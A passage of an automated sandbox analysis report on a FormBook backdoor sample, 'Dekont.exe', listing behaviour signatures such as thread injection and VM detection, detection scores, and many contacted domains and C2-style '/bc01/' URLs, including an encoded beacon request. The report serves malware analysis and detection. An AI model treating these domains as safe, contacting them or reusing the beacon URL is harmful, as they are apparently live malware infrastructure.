7 15->20 injected 74 Loading BitLocker PowerShell Module 18->74 23 WmiPrvSE.exe 18->23         started        25 conhost.exe 18->25         started        process9 dnsIp10 42 www.oko.events 185.26.122.70, 49715, 80 HOSTLANDRU Russian Federation 20->42 27 control.exe 20->27         started        process11 signatures12 54 Modifies the context of a thread in another process (thread injection) 27->54 56 Maps a DLL or memory area into another process 27->56 58 Tries to detect virtualization through RDTSC time measurements 27->58 60 Switches to a custom stack to bypass stack traces 27->60 30 cmd.exe 1 27->30         started        process13 process14 32 conhost.exe 30->32         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Dekont.exe58%ReversingLabsWin32.Backdoor.FormBook
          Dekont.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://excel.office.com0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          https://api.msn.com/0%URL Reputationsafe
          http://www.eals.latReferer:0%Avira URL Cloudsafe
          http://www.omotech-dz.netReferer:0%Avira URL Cloudsafe
          http://www.nnevateknoloji.xyzReferer:0%Avira URL Cloudsafe
          http://www.nnevateknoloji.xyz/bc01/0%Avira URL Cloudsafe
          https://word.office.comon0%Avira URL Cloudsafe
          http://www.oko.eventsReferer:0%Avira URL Cloudsafe
          https://powerpoint.office.comcember0%Avira URL Cloudsafe
          http://www.omotech-dz.net/bc01/www.y-language-menu.net0%Avira URL Cloudsafe
          http://www.avada-casino-tlj.buzz/bc01/0%Avira URL Cloudsafe
          http://www.lkjuy.xyz/bc01/0%Avira URL Cloudsafe
          http://www.lussalesapp.websiteReferer:0%Avira URL Cloudsafe
          http://www.oko.events0%Avira URL Cloudsafe
          www.avada-casino-tlj.buzz/bc01/0%Avira URL Cloudsafe
          http://www.y-language-menu.net/bc01/www.ebshieldsrenew.live0%Avira URL Cloudsafe
          http://www.oko.events/bc01/0%Avira URL Cloudsafe
          http://www.hildrens-clothing.today/bc01/0%Avira URL Cloudsafe
          http://www.inancialenlightment.infoReferer:0%Avira URL Cloudsafe
          http://www.48xc300mw.autosReferer:0%Avira URL Cloudsafe
          http://www.qzxx.top0%Avira URL Cloudsafe
          http://www.qzxx.top/bc01/0%Avira URL Cloudsafe
          http://www.avada-casino-tlj.buzz/bc01/www.qzxx.top0%Avira URL Cloudsafe
          http://www.48xc300mw.autos/bc01/0%Avira URL Cloudsafe
          http://www.ebshieldsrenew.live/bc01/0%Avira URL Cloudsafe
          http://www.hildrens-clothing.today/bc01/www.olocaustaffirmer.net0%Avira URL Cloudsafe
          http://www.lussalesapp.website0%Avira URL Cloudsafe
          http://www.olocaustaffirmer.netReferer:0%Avira URL Cloudsafe
          http://www.48xc300mw.autos/bc01/www.avada-casino-tlj.buzz0%Avira URL Cloudsafe
          http://www.y-language-menu.netReferer:0%Avira URL Cloudsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%Avira URL Cloudsafe
          http://www.qzxx.topReferer:0%Avira URL Cloudsafe
          http://www.olocaustaffirmer.net/bc01/0%Avira URL Cloudsafe
          http://www.lkjuy.xyzReferer:0%Avira URL Cloudsafe
          http://www.ar-accident-lawyer-389.today/bc01/www.nnevateknoloji.xyz0%Avira URL Cloudsafe
          http://www.omotech-dz.net/bc01/0%Avira URL Cloudsafe
          http://www.y-language-menu.net/bc01/0%Avira URL Cloudsafe
          http://www.eals.lat/bc01/www.lussalesapp.website0%Avira URL Cloudsafe
          https://wns.windows.com/)s0%Avira URL Cloudsafe
          http://www.nnevateknoloji.xyz/bc01/www.eddogbrands.website0%Avira URL Cloudsafe
          http://www.ebshieldsrenew.live0%Avira URL Cloudsafe
          http://www.hildrens-clothing.todayReferer:0%Avira URL Cloudsafe
          http://www.inancialenlightment.info/bc01/0%Avira URL Cloudsafe
          http://www.eddogbrands.website/bc01/0%Avira URL Cloudsafe
          http://www.lussalesapp.website/bc01/0%Avira URL Cloudsafe
          http://www.ar-accident-lawyer-389.today/bc01/0%Avira URL Cloudsafe
          http://www.inancialenlightment.info/bc01/www.omotech-dz.net0%Avira URL Cloudsafe
          http://www.hildrens-clothing.today0%Avira URL Cloudsafe
          http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
          http://www.lkjuy.xyz0%Avira URL Cloudsafe
          http://www.oko.events/bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6&2dptmT=8paLMJPH3rxHgFq00%Avira URL Cloudsafe
          http://www.lkjuy.xyz/bc01/www.inancialenlightment.info0%Avira URL Cloudsafe
          http://www.lussalesapp.website/bc01/www.48xc300mw.autos0%Avira URL Cloudsafe
          http://www.eddogbrands.website0%Avira URL Cloudsafe
          http://www.omotech-dz.net0%Avira URL Cloudsafe
          http://www.avada-casino-tlj.buzzReferer:0%Avira URL Cloudsafe
          http://www.olocaustaffirmer.net0%Avira URL Cloudsafe
          http://www.eddogbrands.website/bc01/www.lkjuy.xyz0%Avira URL Cloudsafe
          https://outlook.com0%Avira URL Cloudsafe
          http://www.inancialenlightment.info0%Avira URL Cloudsafe
          http://www.ebshieldsrenew.live/bc01/www.oko.events0%Avira URL Cloudsafe
          http://www.eals.lat0%Avira URL Cloudsafe
          http://www.olocaustaffirmer.net/bc01/www.eals.lat0%Avira URL Cloudsafe
          http://www.nnevateknoloji.xyz0%Avira URL Cloudsafe
          http://www.ebshieldsrenew.liveReferer:0%Avira URL Cloudsafe
          http://www.eddogbrands.websiteReferer:0%Avira URL Cloudsafe
          http://www.48xc300mw.autos0%Avira URL Cloudsafe
          http://www.avada-casino-tlj.buzz0%Avira URL Cloudsafe
          http://www.ar-accident-lawyer-389.todayReferer:0%Avira URL Cloudsafe
          http://www.eals.lat/bc01/0%Avira URL Cloudsafe
          http://www.ar-accident-lawyer-389.today0%Avira URL Cloudsafe
          http://crl.v0%Avira URL Cloudsafe
          http://www.y-language-menu.net0%Avira URL Cloudsafe
          http://www.oko.events/bc01/www.hildrens-clothing.today0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.oko.events
          		185.26.122.70
          		truetrue
            		unknown
            www.eddogbrands.website
            		unknown
            		unknowntrue
              		unknown
              www.omotech-dz.net
              		unknown
              		unknowntrue
                		unknown
                www.nnevateknoloji.xyz
                		unknown
                		unknowntrue
                  		unknown
                  www.inancialenlightment.info
                  		unknown
                  		unknowntrue
                    		unknown
                    www.y-language-menu.net
                    		unknown
                    		unknowntrue
                      		unknown
                      www.ebshieldsrenew.live
                      		unknown
                      		unknowntrue
                        		unknown
                        www.hildrens-clothing.today
                        		unknown
                        		unknowntrue
                          		unknown
                          www.eals.lat
                          		unknown
                          		unknowntrue
                            		unknown
                            www.ar-accident-lawyer-389.today
                            		unknown
                            		unknowntrue
                              		unknown
                              www.olocaustaffirmer.net
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                www.avada-casino-tlj.buzz/bc01/true
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.oko.events/bc01/?L0D=2d9T+7THaWc2iPFPh4rF72vVDn7gh6g8QCASy1echoulKxCIJZpqtWLObEUMh//SmEX6&2dptmT=8paLMJPH3rxHgFq0true
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://word.office.comonexplorer.exe, 00000006.00000000.2089618463.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.oko.eventsReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.nnevateknoloji.xyzReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://powerpoint.office.comcemberexplorer.exe, 00000006.00000002.4536578423.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2094235679.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.avada-casino-tlj.buzz/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.lkjuy.xyz/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.nnevateknoloji.xyz/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.eals.latReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://excel.office.comexplorer.exe, 00000006.00000000.2089618463.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3854649429.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4533610517.0000000009C22000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.microexplorer.exe, 00000006.00000002.4527294039.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4527411989.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2087941103.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.omotech-dz.netReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.omotech-dz.net/bc01/www.y-language-menu.netexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.oko.events/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.y-language-menu.net/bc01/www.ebshieldsrenew.liveexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.lussalesapp.websiteReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.hildrens-clothing.today/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.inancialenlightment.infoReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.qzxx.topexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.oko.eventsexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.qzxx.top/bc01/explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.48xc300mw.autosReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.hildrens-clothing.today/bc01/www.olocaustaffirmer.netexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.48xc300mw.autos/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.avada-casino-tlj.buzz/bc01/www.qzxx.topexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ebshieldsrenew.live/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.lussalesapp.websiteexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.48xc300mw.autos/bc01/www.avada-casino-tlj.buzzexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.olocaustaffirmer.netReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000006.00000002.4536578423.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2094235679.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.y-language-menu.netReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.qzxx.topReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ar-accident-lawyer-389.today/bc01/www.nnevateknoloji.xyzexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDekont.exe, 00000000.00000002.2068088003.0000000002972000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.olocaustaffirmer.net/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.omotech-dz.net/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.lkjuy.xyzReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.y-language-menu.net/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.eals.lat/bc01/www.lussalesapp.websiteexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.nnevateknoloji.xyz/bc01/www.eddogbrands.websiteexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://wns.windows.com/)sexplorer.exe, 00000006.00000000.2089618463.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ebshieldsrenew.liveexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.hildrens-clothing.todayReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.inancialenlightment.info/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000006.00000000.2095427766.000000000C8D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3097513506.000000000C8E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094949963.000000000C8D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3096503518.000000000C8D8000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ar-accident-lawyer-389.today/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.hildrens-clothing.todayexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.lussalesapp.website/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.eddogbrands.website/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.inancialenlightment.info/bc01/www.omotech-dz.netexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.lkjuy.xyzexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.lkjuy.xyz/bc01/www.inancialenlightment.infoexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.lussalesapp.website/bc01/www.48xc300mw.autosexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.eddogbrands.websiteexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.olocaustaffirmer.netexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://outlook.comexplorer.exe, 00000006.00000000.2089618463.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3849680268.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4533709469.0000000009C96000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.omotech-dz.netexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.eddogbrands.website/bc01/www.lkjuy.xyzexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.avada-casino-tlj.buzzReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.inancialenlightment.infoexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ebshieldsrenew.live/bc01/www.oko.eventsexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.olocaustaffirmer.net/bc01/www.eals.latexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.eals.latexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.eddogbrands.websiteReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000002.4522541380.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3850951608.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2086309850.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3096651186.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.nnevateknoloji.xyzexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.48xc300mw.autosexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ebshieldsrenew.liveReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.avada-casino-tlj.buzzexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ar-accident-lawyer-389.todayReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://api.msn.com/explorer.exe, 00000006.00000002.4530151836.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://crl.vexplorer.exe, 00000006.00000002.4517983808.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2077619011.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.ar-accident-lawyer-389.todayexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
